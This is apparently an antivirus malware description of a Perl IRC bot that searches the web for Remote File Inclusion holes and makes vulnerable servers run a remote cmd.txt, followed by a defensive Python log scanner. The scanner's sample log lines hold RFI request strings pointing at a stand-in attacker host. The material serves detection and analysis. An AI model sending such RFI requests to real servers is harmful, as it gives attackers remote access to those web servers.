| Detection added | Oct 05 2007 16:47 GMT |
| Update released | Oct 05 2007 18:11 GMT |
| Description added | Aug 04 2008 |
| Behavior | Hacker Tool |
This malicious program is a hacking utility. It is a Perl script. The size
of infected files may vary from 12KB to 69KB.
This script is an IRC bot which is used to search for Remote File Inclusion
(RFI) vulnerabilities.
Depending on the commands received, the bot can:
- wipe log files
- search for sites with RFI vulnerabilities. In order to find a
site, the bot is given a keyword. It then uses the keyword with the following
search services:
http://www.google.nl
http://busca.uol.com.br
http://www.alltheweb.com
http://it.ask.com
http://search.aol.com
http://suche.fireball.de
http://search.lycos.com
http://arianna.libero.it
http://search.yahoo.com
http://search.live.com
If sites are found which contain the substrings "buterfly" and "uid=" in the
address, the malicious program creates a request which redirects the address
to the following link:
http://linknet*****.com/source/cmd.txt?
The contents of this file will then be run on the site's web server. This
provides the remote malicious user with access to the server.
The script also contains the following string:
Yogya Ceria Scaner Bot Created By eviL-Zone -= evil =-
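
Added example, not part of the original description and not the bot's own code: a Python check for web server access logs that flags requests in which a query parameter carries a remote URL, the shape of the request described above. The log lines, the host names `attacker.example` and `partner.example`, and the "combined" log format are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of an Apache/nginx "combined" log entry (format is an assumption).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def rfi_findings(log_line):
    """Return [(client, param, value, trailing_qmark)] for each query
    parameter whose URL-decoded value is itself a remote URL."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    client, target = m.groups()
    findings = []
    # parse_qsl percent-decodes, so uid=http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = value.strip()
        if REMOTE_URL_RE.match(value):
            # A trailing "?" turns any suffix the application appends into the
            # remote URL's query string; treat it as a high-confidence marker.
            findings.append((client, name, value, value.endswith("?")))
    return findings

# Constructed sample lines; addresses are documentation ranges, hosts are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Oct/2007:16:40:01 +0000] "GET /index.php?uid=http://attacker.example/source/cmd.txt? HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [05/Oct/2007:16:40:02 +0000] "GET /view.php?page=http%3A%2F%2Fattacker.example%2Fsource%2Fcmd.txt%3F HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.4 - - [05/Oct/2007:16:41:10 +0000] "GET /index.php?uid=42&lang=en HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.9 - - [05/Oct/2007:16:42:30 +0000] "GET /out.php?url=https://partner.example/ HTTP/1.1" 302 0 "-" "-"',
]

def scan(lines):
    """Collect findings for a whole log, high-confidence (trailing '?') first."""
    hits = [f for line in lines for f in rfi_findings(line)]
    return sorted(hits, key=lambda f: not f[3])

if __name__ == "__main__":
    for client, name, value, qmark in scan(SAMPLE_LOG):
        print(f"{client} param={name} value={value} trailing_qmark={qmark}")
```

The last sample line is a legitimate redirect parameter that also matches, which is why the trailing-`?` flag is reported separately for triage.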
If your computer does not have an up-to-date antivirus, or does not have an
antivirus solution at all, follow the instructions below to delete the malicious
program:
- Delete the original malicious program file (the location will
depend on how the program originally penetrated the victim machine).
- Update your antivirus databases and perform a full scan of the
computer (download a trial version of Kaspersky Anti-Virus).